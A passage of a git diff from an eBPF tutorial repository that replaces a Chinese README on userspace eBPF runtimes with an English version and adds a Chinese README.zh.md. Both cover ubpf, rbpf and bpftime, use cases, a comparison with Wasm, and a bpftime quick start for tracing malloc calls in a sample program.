(ns) | Insn Count | -|------------------------|-------------:|---------------:|---------------:| -| Uprobe | 3224.172760 | 314.569110 | 4 | -| Uretprobe | 3996.799580 | 381.270270 | 2 | -| Syscall Tracepoint | 151.82801 | 232.57691 | 4 | -| Embedding runtime | Not available | 110.008430 | 4 | +## Why is Having a Userspace Version of eBPF Interesting? -bpftime 可以类似 Kernel 中的 Uprobe 那样,自动将 eBPF 运行时注入到用户空间进程中,无需修改用户空间进程的代码,也无需进行重启进程即可使用。对于 ubpf 和 rbpf 而言,它们依然需要手动编写胶水代码和其他用户空间程序进行集成,相对来说限制了它们的使用场景。在某些场景下,bpftime 可能能作为 kernel eBPF 的一种替代方案,它也不依赖于具体内核版本或 Linux 平台,可以在其他平台上运行。 +eBPF, while renowned for its kernel-space operations, has observed a growing interest in its userspace adaptations. Here's why migrating eBPF to userspace is capturing the attention of technologists: -## 为什么用户空间版本的 eBPF 会吸引如此多的关注? +### Enhanced Performance -eBPF,原本因其在内核空间的强大性能而被广泛认知,但近年来,其在用户空间的实现也引起了业界的浓厚兴趣。以下是技术社区对于 eBPF 迁移到用户空间的热切关注的核心原因: +In kernel operations, the Uprobe component of eBPF is often beleaguered by performance inefficiencies, primarily due to the overheads introduced by context switches. In latency-sensitive applications, these inefficiencies can be detrimental, affecting real-time monitoring and data processing. By transitioning to userspace, eBPF can bypass these context switch related delays, leading to a more optimized performance. Runtimes like `bpftime` exemplify this, offering substantial performance improvements compared to their kernel counterparts. -### 性能提升 +### Flexibility and Integration -在内核空间,eBPF 的 Uprobe 组件时常面临因上下文切换带来的性能瓶颈。这在延迟敏感的应用中可能导致不良影响,从而对实时监控和数据处理带来挑战。但用户空间版本的 eBPF 能够绕过与上下文切换有关的性能损失,实现更高的性能优化。例如,`bpftime` 运行时在用户空间的表现,相较于其内核版本,展现出了显著的性能增益。 +Userspace eBPF runtimes champion flexibility. Unlike some alternatives, such as the Wasm runtime, which might necessitate manual integrations, userspace eBPF provides the boon of automatic instrumentation. This means they can be seamlessly introduced into running processes without the need for cumbersome restarts or recompilations, ensuring smoother operational flows. -### 灵活性与集成度 +### Augmented Security -用户空间的 eBPF 运行时带来了更大的灵活性。与其他解决方案如 Wasm 运行时相比,它们无需手动集成即可提供自动插桩的特性。这意味着开发者可以轻松地将其集成进正在运行的进程中,避免了因重新启动或重新编译带来的操作中断。 +Operating in kernel mode, eBPF programs require root access, which can inadvertently expand the attack surface, making systems susceptible to vulnerabilities like container escapes or even potential kernel exploits. Userspace runtimes, however, operate outside this high-risk zone. By functioning in userspace, they demand fewer privileges, inherently reducing the potential avenues for security breaches. -### 安全性加固 +### Debugging and Licensing Flexibility -在内核空间,eBPF 的执行通常需要 root 访问权限,这可能无意中增加了系统的攻击面,使其容易受到例如容器逃逸或潜在的内核利用等安全威胁。相反,用户空间的实现在这种高风险环境之外运作。它们在用户空间中运行,大大降低了对高权限的依赖,从而减少了潜在的安全风险。 +One of the innate advantages of userspace eBPF runtimes is the ease with which developers can debug their code. The accessibility to integrate breakpoints in a userspace interpreter is a marked advantage over the relatively constrained debugging capabilities in kernel eBPF. Additionally, the licensing flexibility of userspace eBPF runtimes, typically offered under licenses like Apache or MIT, ensures they can be paired with a diverse range of projects, including proprietary ones, sidestepping the GPL constraints associated with kernel code. -### 调试与许可的便利性 +## Use Cases: Existing eBPF Userspace Applications -用户空间 eBPF 的一个显著优点是,它为开发者提供了更加直观的调试环境。相对于内核空间中有限的调试手段,用户空间解释器提供的断点调试功能更为方便。此外,用户空间 eBPF 的许可证更加灵活,通常采用 Apache 或 MIT 这样的开源许可,这意味着它们可以轻松地与各种项目(包括商业项目)相结合,避免了与内核代码相关的 GPL 限制。 - -## 使用案例:现有的 eBPF 用户空间应用 - -用户空间 eBPF 正在项目中使用,每个项目都利用 eBPF 的独特功能来增强它们的功能: +Userspace eBPF is being utilized in a number of notable projects, each harnessing the unique capabilities of eBPF to enhance their functionalities. Here's how Userspace eBPF is currently utilized in various applications: 1. [**Oko:**](https://github.com/Orange-OpenSource/Oko) + + Oko is an extension of Open vSwitch-DPDK that provides runtime extension with BPF programs. It enables the use of BPF programs to process packets in userspace, providing flexible packet processing and facilitating the integration of Open vSwitch with other systems. - Oko 是 Open vSwitch-DPDK 的扩展,提供了与 BPF 程序的运行时扩展。它允许使用 BPF 程序在用户空间处理数据包,提供灵活的数据包处理,并促进 Open vSwitch 与其他系统的集成。 +1. [**DPDK eBPF Support:**](https://www.dpdk.org/wp-content/uploads/sites/35/2018/10/pm-07-DPDK-BPFu6.pdf) -1. [**DPDK eBPF 支持:**](https://www.dpdk.org/wp-content/uploads/sites/35/2018/10/pm-07-DPDK-BPFu6.pdf) - - DPDK (数据平面开发套件) eBPF 支持通过允许在用户空间使用 eBPF 程序来促进快速的数据包处理,这些程序可以加载并运行以分析网络数据包。这增强了网络应用的灵活性和可编程性,无需修改内核。 + The DPDK (Data Plane Development Kit) eBPF support facilitates fast packet processing by enabling the use of eBPF programs in userspace, which can be loaded and run to analyze network packets. This enhances the flexibility and programmability of network applications without requiring kernel modifications. 1. [**Solana:**](https://solana.com/) - Solana 利用 eBPF 实现一个 JIT (即时)编译器,这对于在其区块链网络上执行智能合约是至关重要的。使用 eBPF 确保了安全性、性能和架构中立性,从而允许在 Solana 区块链上的验证器节点上高效地执行智能合约。 + Solana utilizes eBPF to implement a JIT (Just-In-Time) compiler, which is essential for executing smart contracts on its blockchain network. The use of eBPF ensures safety, performance, and architecture agnosticism, thus allowing efficient execution of smart contracts across validator nodes on the Solana blockchain. -1. [**eBPF for Windows (进行中的工作):**](https://github.com/microsoft/ebpf-for-windows) +1. [**eBPF for Windows (Work-In-Progress):**](https://github.com/microsoft/ebpf-for-windows) - 该项目旨在将 Linux 生态系统中熟悉的 eBPF 工具链和 API 带到 Windows,允许在 Windows 之上使用现有的 eBPF 工具链。这展示了将 eBPF 的功能扩展到 Linux 之外的有前景的尝试,尽管它仍然是一个进行中的工作。 + This project is aimed at bringing the eBPF toolchains and APIs familiar in the Linux ecosystem to Windows, allowing existing eBPF toolchains to be utilized on top of Windows. This demonstrates a promising endeavor to extend the capabilities of eBPF beyond Linux, although it's still a work in progress. -使用 eBPF 的这些应用的好处包括: +The benefits of using eBPF in these applications include: -- **灵活性:** eBPF 提供了一个灵活的框架,用于在内核或用户空间中运行程序,使开发人员能够扩展现有系统的功能,而无需修改其核心代码。 -- **性能:** 通过允许 JIT 编译和高效的数据包处理,eBPF 可以显著提高网络应用和区块链智能合约执行的性能。 -- **安全性和安全性:** eBPF 框架为验证程序执行前的安全属性提供了机制,从而确保了其集成的系统的完整性和安全性。 -- **跨平台能力:** eBPF 指令集的架构中立性使得跨平台兼容性成为可能,如 Solana 项目和进行中的 eBPF for Windows 所示。 +- **Flexibility:** eBPF provides a flexible framework for running programs in the kernel or userspace, enabling developers to extend the functionality of existing systems without modifying their core code. +- **Performance:** By allowing JIT compilation and efficient packet processing, eBPF can significantly enhance the performance of network applications and blockchain smart contract execution. +- **Safety and Security:** The eBPF framework provides mechanisms for verifying the safety properties of programs before execution, thus ensuring the integrity and security of the systems it is integrated with. +- **Cross-platform Capability:** The architecture-agnostic nature of eBPF instruction set enables cross-platform compatibility, as seen in projects like Solana and the work-in-progress eBPF for Windows. -这些属性使 eBPF 成为增强各种应用的强大工具,从网络处理到区块链智能合约执行,再到更多。还有一些论文讨论了在用户空间中使用 eBPF 的用途: +These attributes make eBPF a powerful tool for augmenting a variety of applications, ranging from network processing to blockchain smart contract execution, and beyond. There are also some papers that discuss the use of eBPF in userspace: -1. [**RapidPatch: 用于实时嵌入式设备的固件热修复**](https://www.usenix.org/conference/usenixsecurity22/presentation/he-yi): +1. [**RapidPatch: Firmware Hotpatching for Real-Time Embedded Devices**](https://www.usenix.org/conference/usenixsecurity22/presentation/he-yi): + + This paper introduces a new hotpatching framework named RapidPatch, which is designed to facilitate the propagation of patches by installing generic patches on heterogeneous embedded devices without disrupting other tasks running on them. - 本文介绍了一个名为 RapidPatch 的新的热修复框架,该框架旨在通过在异构嵌入式设备上安装通用修复程序来促进修复的传播,而不会中断它们上运行的其他任务。此外,RapidPatch 提出了两种类型的 eBPF 补丁,用于不同类型的漏洞,并开发了一个 eBPF 补丁验证器以确保补丁安全。 + Furthermore, RapidPatch proposes two types of eBPF patches for different types of vulnerabilities and develops an eBPF patch verifier to ensure patch safety. -2. [**Femto-Containers: 低功耗 IoT 微控制器上的小型软件功能的轻量级虚拟化和故障隔离**](https://arxiv.org/abs/2210.03432): +1. [**Femto-Containers: Lightweight Virtualization and Fault Isolation For Small Software Functions on Low-Power IoT Microcontrollers**](https://arxiv.org/abs/2210.03432): - 本文介绍了 Femto-Containers,这是一个新颖的框架,允许在低功耗 IoT 设备上安全地部署、执行和隔离小型虚拟软件功能。该框架在 RIOT 中实现并提供,RIOT 是一个受欢迎的开源 IoT 操作系统,强调在低功耗 IoT 设备上安全地部署、执行和隔离小型虚拟软件功能。该论文讨论了在一个常见的低功耗 IoT 操作系统 (RIOT) 中集成的 Femto-Container 主机引擎的实现,增强了其在标准的 IPv6/6LoWPAN 网络上按需启动、更新或终止 Femto-Containers 的能力。 + This paper presents Femto-Containers, a novel framework that enables the secure deployment, execution, and isolation of small virtual software functions on low-power IoT devices over a network. -这些论文深入探讨了固件补丁和轻量级虚拟化方面的相关进展,展示了针对实时嵌入式系统和低功耗 IoT 微控制器领域的关键挑战的创新。 + The framework is implemented and provided in RIOT, a popular open source IoT operating system, with an emphasis on secure deployment, execution, and isolation of small virtual software functions on low-power IoT devices, over the network. -## 用户空间 eBPF 运行时 vs Wasm 运行时 + The paper discusses the implementation of a Femto-Container hosting engine integrated within a common low-power IoT operating system (RIOT), enhancing it with the ability to start, update, or terminate Femto-Containers on demand, securely over a standard IPv6/6LoWPAN network. + +These papers delve into pertinent advancements concerning firmware patching and lightweight virtualization, demonstrating innovations that address critical challenges in the domains of real-time embedded systems and low-power IoT microcontrollers respectively. -在不断发展的云原生和边缘计算领域中,eBPF (扩展的伯克利数据包过滤器) 和 Wasm (WebAssembly) 都已成为强大的工具。但它们都有自己的设计原则和权衡取舍。 +## Userspace eBPF Runtime vs Wasm Runtime -## eBPF 在用户空间运行时 vs Wasm 运行时:云原生计算的新纪元 +In the evolving landscape of cloud-native and edge computing, both eBPF (extended Berkeley Packet Filter) and Wasm (WebAssembly) have emerged as powerful tools. However, they come with their own set of design principles and trade-offs. -在飞速进展的云原生与边缘计算生态中,eBPF (扩展的伯克利数据包过滤器) 和 Wasm (WebAssembly) 被广泛认为是两大技术巨头。这两者虽然都非常强大,但各有其独特的设计哲学与优缺点。 - -### eBPF 与 Wasm 之间的技术差异 +### A Comparison of eBPF and Wasm **eBPF**: -- **核心理念**:eBPF 是为了满足高性能要求而设计的,特别是针对实时内核交互和高吞吐量的网络任务。 -- **安全性**:尽管eBPF的主要焦点是性能,但其验证器机制确保了执行的程序在不引发内核恐慌或无限循环的前提下的安全性。 - +- **Philosophy**: eBPF prioritizes performance, often making it the choice for real-time kernel operations and high-throughput networking tasks. +- **Security**: While performance takes the forefront, security in eBPF is ensured through the use of a verifier, ensuring that all programs are safe to run without causing kernel panics or infinite loops. + **Wasm**: -- **核心理念**:Wasm 诞生于网络环境,其设计重点在于可移植性和执行安全性,旨在实现接近本地机器代码的执行速度。 -- **安全性**:Wasm 的安全策略主要基于软件故障隔离 (SFI)。沙盒执行确保了代码的安全性,但这可能会带来某些运行时的额外开销。 +- **Philosophy**: Originally designed for the web, Wasm places a higher emphasis on portability and security. It was conceived to execute code nearly as fast as running native machine code and ensures safety in hostile environments like web browsers. +- **Security**: The primary security model for Wasm revolves around Software Fault Isolation (SFI). This model guarantees safe execution by enforcing sandboxing, even though this can introduce some runtime overheads. -这两种技术都依赖于底层的库来执行复杂任务,如 Wasm 所依赖的 `Wasi-nn` 来进行神经网络处理。与这些外部API 交互时,特别是在 Wasm 的环境下,需要进行更多的验证和运行时检查,这可能导致额外的性能损耗。而eBPF则提供了一个更为性能中心化的策略,其验证器确保了代码在主机上的安全执行,而不需要运行时的额外开销。 +For both technologies, reliance on underlying libraries for complex operations is paramount. For instance, Wasm leans on libraries like `Wasi-nn` for neural network operations. However, when interfacing with such external APIs, especially in Wasm's context, there's a need for additional validation and runtime checks, sometimes leading to substantial performance costs. eBPF, when embedded within the host, capitalizes on its verifier to ensure code safety, offering a more performance-centric approach. -在语言支持上,由于 eBPF 的专业特性,其语言选择较为有限,通常是 C 和 Rust。而Wasm则支持更多的编程语言,包括但不限于 C、C++、Rust、Go、Python、Java和C#。这使得Wasm在跨平台部署上有更大的灵活性,但也可能因为不恰当的语言选择引入更多的性能开销。 +On the language support front, while eBPF's niche and specialized nature mean limited language support, Wasm boasts a broader language portfolio due to its origin and design for the web. -为了给大家提供一个直观的对比,我们在 [https://github.com/eunomia-bpf/bpf-benchmark](https://github.com/eunomia-bpf/bpf-benchmark)中展示了eBPF和Wasm运行时的性能比较。 +## bpftime Quick Start -从更宏观的角度看,eBPF运行时和Wasm实际上可以被视为是相互补充的。尽管 eBPF 拥有出色的验证器机制来确保运行时安全性,但由于其编程语言的局限性和相对较高的开发难度,它并不总是适合作为业务逻辑的首选运行时。反之,eBPF 更适用于像网络流量转发、可观测性和 livepatch 这样的高专业性任务。相对而言,Wasm 运行时可以作为 Serverless 的运行时平台、插件系统和轻量级虚拟化等场景的首选。这两者都有自己的优势,但它们的选择取决于特定的用例和优先级。 +With `bpftime`, you can build eBPF applications using familiar tools like clang and libbpf, and execute them in userspace. For instance, the `malloc` eBPF program traces malloc calls using uprobe and aggregates the counts using a hash map. -## bpftime 快速入门 +You can refer to [documents/build-and-test.md](https://eunomia.dev/bpftime/documents/build-and-test) for how to build the project, or using the container images from [GitHub packages](https://github.com/eunomia-bpf/bpftime/pkgs/container/bpftime). -使用`bpftime`,您可以使用熟悉的工具(如clang和libbpf)构建eBPF应用程序,并在用户空间中执行它们。例如,`malloc` eBPF程序使用uprobe跟踪malloc调用,并使用哈希映射对其进行统计。 - -您可以参考[documents/build-and-test.md](https://eunomia.dev/bpftime/documents/build-and-test)上的构建项目的方法,或者使用来自[GitHub packages](https://github.com/eunomia-bpf/bpftime/pkgs/container/bpftime)的容器映像。 - -要开始,请构建并运行一个基于libbpf的eBPF程序,使用以下命令行: +To get started, you can build and run a libbpf based eBPF program starts with `bpftime` cli: ```console -make -C example/malloc # 构建示例的eBPF程序 +make -C example/malloc # Build the eBPF program example bpftime load ./example/malloc/malloc ``` -在另一个shell中,运行带有eBPF的目标程序: +In another shell, Run the target program with eBPF inside: ```console $ bpftime start ./example/malloc/victim @@ -155,25 +152,25 @@ continue malloc... malloc called from pid 250215 ``` -您还可以动态地将eBPF程序附加到正在运行的进程上: +You can also dynamically attach the eBPF program with a running process: ```console -$ ./example/malloc/victim & echo $! # 进程ID为101771 +$ ./example/malloc/victim & echo $! # The pid is 101771 [1] 101771 101771 continue malloc... continue malloc... ``` -然后附加到该进程: +And attach to it: ```console -$ sudo bpftime attach 101771 # 您可能需要以root身份运行make install +$ sudo bpftime attach 101771 # You may need to run make install in root Inject: "/root/.bpftime/libbpftime-agent.so" -成功注入。ID: 1 +Successfully injected. ID: 1 ``` -您可以看到原始程序的输出: +You can see the output from original program: ```console $ bpftime load ./example/malloc/malloc @@ -183,7 +180,7 @@ $ bpftime load ./example/malloc/malloc pid=247322 malloc calls: 10 ``` -或者,您也可以直接在内核eBPF中运行我们的示例eBPF程序,以查看类似的输出: +Alternatively, you can also run our sample eBPF program directly in the kernel eBPF, to see the similar output: ```console $ sudo example/malloc/malloc @@ -194,19 +191,21 @@ $ sudo example/malloc/malloc pid=34809 malloc calls: 8 ``` -有关更多详细信息,请参阅[documents/usage.md](https://eunomia.dev/bpftime/documents/usage)。 +See [documents/usage.md](https://eunomia.dev/bpftime/documents/usage) for more details. -## 总结与前景 +## Conclusion -用户空间的eBPF运行时正在打破边界,将eBPF的能力从内核扩展到了更广阔的领域。这种扩展带来了显著的性能、灵活性和安全性提升。例如,`bpftime`运行时显示了其在某些低级性能场景下,甚至超越了像 Wasm 这样的其他技术。也有越来越多的应用将用户空间的 eBPF 用于快速补丁、轻量级虚拟化、网络过滤等场景。 +Userspace eBPF runtimes are an exciting development that expands the capabilities of eBPF beyond the kernel. As highlighted in this post, they offer compelling benefits like enhanced performance, flexibility, and security compared to kernel-based eBPF. Runtimes like bpftime demonstrate the potential for substantial speedups, even outperforming alternatives like Wasm runtimes in certain dimensions like low-level performance. -Wasm 的主要焦点在于可移植性、轻量级虚拟化、安全性、多语言等等,而 eBPF 则针对那些对性能有严格要求的基础设施任务提供了更多的性能优势和动态插桩特性。选择哪种技术取决于特定的需求和优先级。随着它们的进一步发展,用户空间的eBPF运行时正在成为云原生技术堆栈中的重要部分,为业界带来前所未有的安全、效率和创新的组合。 +With innovative frameworks like RapidPatch and Femto-Containers utilizing userspace eBPF for patching and lightweight virtualization respectively, we are witnessing pioneering use cases that address critical challenges in embedded systems and IoT domains. As eBPF continues its evolution in userspace, we can expect even more creative applications that augment everything from smart contracts to network protocols. -> 我们诚邀您深入探索用户空间eBPF的世界,您可以从我们的项目 [https://github.com/eunomia-bpf/bpftime](https://github.com/eunomia-bpf/bpftime) 开始。您的贡献、反馈或仅仅是对此工具的使用和 star,都可以为我们的社区带来巨大价值。 +While alternatives like Wasm certainly have their place with a strong emphasis on web portability and security, eBPF's specialized nature gives it an edge for performance-critical tasks. Ultimately, the choice between the two depends on the specific use case and priorities. As they continue to evolve, userspace eBPF runtimes are cementing their position as an indispensable part of the cloud-native technology stack, offering an unparalleled combination of safety, efficiency and innovation. + +> We encourage our readers to dive deep into the world of userspace eBPF, starting with our bpftime GitHub repository: Contributions, feedback, or simply using the tool can further the cause and provide invaluable insights to the community. > -> 若您在研究中采用了我们的`bpftime`项目,请[引用我们的仓库](https://github.com/eunomia-bpf/bpftime/blob/master/CITATION.cff)。我们期待您的宝贵意见和反馈,您可以通过 GitHub 仓库的 issue、邮箱 [yunwei356@gmail.com](mailto:yunwei356@gmail.com) 或微信 yunwei2567 与我们联系。 +> If you use our project in research, please [cite our repo](https://github.com/eunomia-bpf/bpftime/blob/master/CITATION.cff). -## 参考资料 +## reference 1. bpftime: 2. ubpf: diff --git a/src/36-userspace-ebpf/README.zh.md b/src/36-userspace-ebpf/README.zh.md new file mode 100644 index 0000000..be83019 --- /dev/null +++ b/src/36-userspace-ebpf/README.zh.md @@ -0,0 +1,219 @@ +# 用户空间 eBPF 运行时:深度解析与应用实践 + +郑昱笙 + +本文旨在对用户空间的 eBPF 运行时和对应的一些应用场景进行剖析和总结。尽管大多数人对基于内核的 eBPF 已有所了解,用户空间 eBPF 的进展和应用实践同样引人注目。本文还将探讨用户空间 eBPF 运行时与 Wasm 运行时的技术比较,后者在云原生和边缘计算领域已获得广泛的关注。我们也新开源了一个用户态 eBPF 运行时 [bpftime](https://github.com/eunomia-bpf/bpftime)。通过 LLVM `JIT/AOT` 后端支持,我们的基准测试表明 bpftime 是最快的用户空间 eBPF 运行时之一,同时还可以让内核中间的 eBPF Uprobe 无缝在用户空间运行,获得近十倍的性能提升。 + +## eBPF:内核的动态扩展运行时与字节码 + +### eBPF 究竟是何方神圣? + +eBPF,全称 "extended Berkeley Packet Filter",是一项允许在不更改内核源代码或重启系统的情况下动态干预和修改内核行为的革命性技术。虽然 eBPF 起初是作为网络数据包过滤工具而设计,但如今已广泛应用于从性能分析到安全策略等多个方面,逐渐成为系统管理员的得力助手。 + +eBPF 的前身,Berkeley Packet Filter (BPF) —— 20 世纪 90 年代初的产物,主要用于网络数据包的高效过滤。尽管 BPF 已被广大用户所认可,eBPF 的出现则为其带来了更为广泛的指令集,并能直接与内核数据结构互动。自 2014 年 Linux 内核引入 eBPF 以后,它的影响力迅速扩张。Linux 的核心开发团队不断地完善 eBPF,使其从一个基础的网络数据包过滤器逐渐演变为一个功能强大的字节码引擎。 + +### eBPF 对现代计算和网络的深远影响 + +随着现代计算环境日益复杂,实时数据的采集和深入分析显得尤为重要。在这一背景下,eBPF 凭借其卓越的动态性,为开发者和管理员提供了实时干预系统行为的强大工具。eBPF 以其卓越的灵活性在现代网络解决方案中占据核心地位。它为流量控制、负载均衡及安全策略在内核级别提供了细致的控制手段,确保了系统的性能优化和安全稳定。同时,eBPF 在系统可观察性上也做出了显著贡献,为各种系统调用和硬件事件提供了详细的可编程追踪方案,促进了问题的迅速定位和解决。 + +## 用户空间 eBPF 运行时:eBPF 的新生代 + +### 什么是用户空间 eBPF 运行时? + +虽然 eBPF 最初是为内核设计的,但它在用户空间的巨大潜力,以及内核对于 `GPL LICENSE` 的限制,也催生了用户空间 eBPF 运行时的产生。这些运行时允许开发者在内核之外利用 eBPF 的能力,提供了一个在内核之外的运行平台,扩展其实用性和适用性,同时不受限于 GPL LICENSE。虽然 eBPF 的一个突出特点是其在内核空间内执行代码的能力,提供快速的可观察性和数据聚合,但在某些情境下,拥有一个用户空间的替代方案变得非常有价值。这些用户空间运行时扩展了 eBPF 多功能性的范围,超越了内核集成,并常常作为特定用例的实验场地、调试工具或框架。 + +### 特定运行时简介 + +#### **ubpf** + +[uBPF](https://github.com/iovisor/ubpf) 是将 eBPF 引入用户空间的早期尝试之一。主要作为一个概念证明,它作为 eBPF 解释器的用户空间解释与 x86_64 和 arm64 JIT 的结合。尽管其起源是一个早期原型,uBPF 吸引了注意并被用作高性能网络项目(如 DPDK 和 Oko)的基础。它的非 GPL 许可证(Apache)使其适用于各种项目,包括非开源项目。然而,最近,uBPF 正在迎头赶上内核发展,特别是微软为其 eBPF Windows 实现做出的贡献。但是,开发 ubpf 和 rbpf 程序可能需要一个特定的工具链,这对于一些用户可能是一个障碍。ubpf 只有一个有限的哈希 maps 实现,对大多数场景而言可能不够。另外,ubpf 本身只是一个虚拟机/解释器,在实际的使用中,依然需要编写胶水代码,和其他用户空间程序进行编译、链接后才能使用。 + +#### **rbpf** + +[rbpf](https://github.com/qmonnet/rbpf) 和 uBPF 非常相似,但重点是使用了 Rust 进行开发,这是一种因其内存安全保证而著称的语言。创建 rbpf 是由于想要探索 eBPF 和 Rust 的交集。虽然没有广泛采纳,但 rbpf 的知名用户包括 Solana 团队,他们使用它为带有 eBPF 驱动的智能合约的区块链工具。rbpf 的一个优势在于其许可证 (MIT),允许在各种项目中广泛重用。rbpf 也缺乏 eBPF Maps 支持,并且仅为 x86_64 提供 JIT 支持。同样,rbpf 也需要编译和手动嵌入对应的应用程序中才可以使用。 + +#### **bpftime** + +基于 LLVM JIT/AOT 构建的 [bpftime](https://github.com/eunomia-bpf/bpftime) 是专为用户空间操作设计的一个高性能 eBPF 运行时。它以其快速的 Uprobe 能力和 Syscall 钩子脱颖而出,尤其是 Uprobe 性能比内核提高了十倍。此外,bpftime 提供编程 syscall 钩子、共享内存映射和与熟悉的工具链(如 libbpf 和 clang)的兼容性。其设计解决了一些内核 eBPF 的限制,并在某些方面超越了像 Wasm 运行时这样的插件系统。这是使用 Userspace bpftime 的 eBPF 进行 Hook 的一些性能数据,将用户空间和内核空间进行对比: + +| Probe/Tracepoint Types | Kernel (ns) | Userspace (ns) | Insn Count | +|------------------------|-------------:|---------------:|---------------:| +| Uprobe | 3224.172760 | 314.569110 | 4 | +| Uretprobe | 3996.799580 | 381.270270 | 2 | +| Syscall Tracepoint | 151.82801 | 232.57691 | 4 | +| Embedding runtime | Not available | 110.008430 | 4 | + +bpftime 可以类似 Kernel 中的 Uprobe 那样,自动将 eBPF 运行时注入到用户空间进程中,无需修改用户空间进程的代码,也无需进行重启进程即可使用。对于 ubpf 和 rbpf 而言,它们依然需要手动编写胶水代码和其他用户空间程序进行集成,相对来说限制了它们的使用场景。在某些场景下,bpftime 可能能作为 kernel eBPF 的一种替代方案,它也不依赖于具体内核版本或 Linux 平台,可以在其他平台上运行。 + +## 为什么用户空间版本的 eBPF 会吸引如此多的关注? + +eBPF,原本因其在内核空间的强大性能而被广泛认知,但近年来,其在用户空间的实现也引起了业界的浓厚兴趣。以下是技术社区对于 eBPF 迁移到用户空间的热切关注的核心原因: + +### 性能提升 + +在内核空间,eBPF 的 Uprobe 组件时常面临因上下文切换带来的性能瓶颈。这在延迟敏感的应用中可能导致不良影响,从而对实时监控和数据处理带来挑战。但用户空间版本的 eBPF 能够绕过与上下文切换有关的性能损失,实现更高的性能优化。例如,`bpftime` 运行时在用户空间的表现,相较于其内核版本,展现出了显著的性能增益。 + +### 灵活性与集成度 + +用户空间的 eBPF 运行时带来了更大的灵活性。与其他解决方案如 Wasm 运行时相比,它们无需手动集成即可提供自动插桩的特性。这意味着开发者可以轻松地将其集成进正在运行的进程中,避免了因重新启动或重新编译带来的操作中断。 + +### 安全性加固 + +在内核空间,eBPF 的执行通常需要 root 访问权限,这可能无意中增加了系统的攻击面,使其容易受到例如容器逃逸或潜在的内核利用等安全威胁。相反,用户空间的实现在这种高风险环境之外运作。它们在用户空间中运行,大大降低了对高权限的依赖,从而减少了潜在的安全风险。 + +### 调试与许可的便利性 + +用户空间 eBPF 的一个显著优点是,它为开发者提供了更加直观的调试环境。相对于内核空间中有限的调试手段,用户空间解释器提供的断点调试功能更为方便。此外,用户空间 eBPF 的许可证更加灵活,通常采用 Apache 或 MIT 这样的开源许可,这意味着它们可以轻松地与各种项目(包括商业项目)相结合,避免了与内核代码相关的 GPL 限制。 + +## 使用案例:现有的 eBPF 用户空间应用 + +用户空间 eBPF 正在项目中使用,每个项目都利用 eBPF 的独特功能来增强它们的功能: + +1. [**Oko:**](https://github.com/Orange-OpenSource/Oko) + + Oko 是 Open vSwitch-DPDK 的扩展,提供了与 BPF 程序的运行时扩展。它允许使用 BPF 程序在用户空间处理数据包,提供灵活的数据包处理,并促进 Open vSwitch 与其他系统的集成。 + +1. [**DPDK eBPF 支持:**](https://www.dpdk.org/wp-content/uploads/sites/35/2018/10/pm-07-DPDK-BPFu6.pdf) + + DPDK (数据平面开发套件) eBPF 支持通过允许在用户空间使用 eBPF 程序来促进快速的数据包处理,这些程序可以加载并运行以分析网络数据包。这增强了网络应用的灵活性和可编程性,无需修改内核。 + +1. [**Solana:**](https://solana.com/) + + Solana 利用 eBPF 实现一个 JIT (即时)编译器,这对于在其区块链网络上执行智能合约是至关重要的。使用 eBPF 确保了安全性、性能和架构中立性,从而允许在 Solana 区块链上的验证器节点上高效地执行智能合约。 + +1. [**eBPF for Windows (进行中的工作):**](https://github.com/microsoft/ebpf-for-windows) + + 该项目旨在将 Linux 生态系统中熟悉的 eBPF 工具链和 API 带到 Windows,允许在 Windows 之上使用现有的 eBPF 工具链。这展示了将 eBPF 的功能扩展到 Linux 之外的有前景的尝试,尽管它仍然是一个进行中的工作。 + +使用 eBPF 的这些应用的好处包括: + +- **灵活性:** eBPF 提供了一个灵活的框架,用于在内核或用户空间中运行程序,使开发人员能够扩展现有系统的功能,而无需修改其核心代码。 +- **性能:** 通过允许 JIT 编译和高效的数据包处理,eBPF 可以显著提高网络应用和区块链智能合约执行的性能。 +- **安全性和安全性:** eBPF 框架为验证程序执行前的安全属性提供了机制,从而确保了其集成的系统的完整性和安全性。 +- **跨平台能力:** eBPF 指令集的架构中立性使得跨平台兼容性成为可能,如 Solana 项目和进行中的 eBPF for Windows 所示。 + +这些属性使 eBPF 成为增强各种应用的强大工具,从网络处理到区块链智能合约执行,再到更多。还有一些论文讨论了在用户空间中使用 eBPF 的用途: + +1. [**RapidPatch: 用于实时嵌入式设备的固件热修复**](https://www.usenix.org/conference/usenixsecurity22/presentation/he-yi): + + 本文介绍了一个名为 RapidPatch 的新的热修复框架,该框架旨在通过在异构嵌入式设备上安装通用修复程序来促进修复的传播,而不会中断它们上运行的其他任务。此外,RapidPatch 提出了两种类型的 eBPF 补丁,用于不同类型的漏洞,并开发了一个 eBPF 补丁验证器以确保补丁安全。 + +2. [**Femto-Containers: 低功耗 IoT 微控制器上的小型软件功能的轻量级虚拟化和故障隔离**](https://arxiv.org/abs/2210.03432): + + 本文介绍了 Femto-Containers,这是一个新颖的框架,允许在低功耗 IoT 设备上安全地部署、执行和隔离小型虚拟软件功能。该框架在 RIOT 中实现并提供,RIOT 是一个受欢迎的开源 IoT 操作系统,强调在低功耗 IoT 设备上安全地部署、执行和隔离小型虚拟软件功能。该论文讨论了在一个常见的低功耗 IoT 操作系统 (RIOT) 中集成的 Femto-Container 主机引擎的实现,增强了其在标准的 IPv6/6LoWPAN 网络上按需启动、更新或终止 Femto-Containers 的能力。 + +这些论文深入探讨了固件补丁和轻量级虚拟化方面的相关进展,展示了针对实时嵌入式系统和低功耗 IoT 微控制器领域的关键挑战的创新。 + +## 用户空间 eBPF 运行时 vs Wasm 运行时 + +在不断发展的云原生和边缘计算领域中,eBPF (扩展的伯克利数据包过滤器) 和 Wasm (WebAssembly) 都已成为强大的工具。但它们都有自己的设计原则和权衡取舍。 + +## eBPF 在用户空间运行时 vs Wasm 运行时:云原生计算的新纪元 + +在飞速进展的云原生与边缘计算生态中,eBPF (扩展的伯克利数据包过滤器) 和 Wasm (WebAssembly) 被广泛认为是两大技术巨头。这两者虽然都非常强大,但各有其独特的设计哲学与优缺点。 + +### eBPF 与 Wasm 之间的技术差异 + +**eBPF**: + +- **核心理念**:eBPF 是为了满足高性能要求而设计的,特别是针对实时内核交互和高吞吐量的网络任务。 +- **安全性**:尽管eBPF的主要焦点是性能,但其验证器机制确保了执行的程序在不引发内核恐慌或无限循环的前提下的安全性。 + +**Wasm**: + +- **核心理念**:Wasm 诞生于网络环境,其设计重点在于可移植性和执行安全性,旨在实现接近本地机器代码的执行速度。 +- **安全性**:Wasm 的安全策略主要基于软件故障隔离 (SFI)。沙盒执行确保了代码的安全性,但这可能会带来某些运行时的额外开销。 + 